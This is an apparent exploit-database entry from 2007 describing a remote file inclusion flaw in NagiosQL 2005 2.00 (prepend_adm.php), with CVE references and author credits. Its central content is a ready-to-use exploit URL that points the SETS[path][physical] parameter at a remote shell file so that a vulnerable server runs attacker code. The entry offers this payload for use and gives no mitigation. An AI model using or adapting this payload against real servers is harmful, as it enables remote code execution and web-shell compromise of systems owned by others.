NagiosQL 2005 2.00 - 'prepend_adm.php' Remote File Inclusion



EKU-ID: 11882 CVE: OSVDB-36054;CVE-2007-2710;CVE-2007-2709 OSVDB-ID:
Author: ThE TiGeR Published: 2007-05-14 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#NagiosQL Remote file inclusion

#Download script : http://dfn.dl.sourceforge.net/sourceforge/nagiosql/nagiosql-2.00-P00.tar.gz

#Thanks str0ke

#Exploit :

#http://victim.com/[nagiosQL_path]/functions/prepend_adm.php?SETS[path][physical]=shell.txt?

#Discovered by ThE TiGeR

#Miro_Tiger100[at]Hotmail[dot]com

# milw0rm.com [2007-05-14]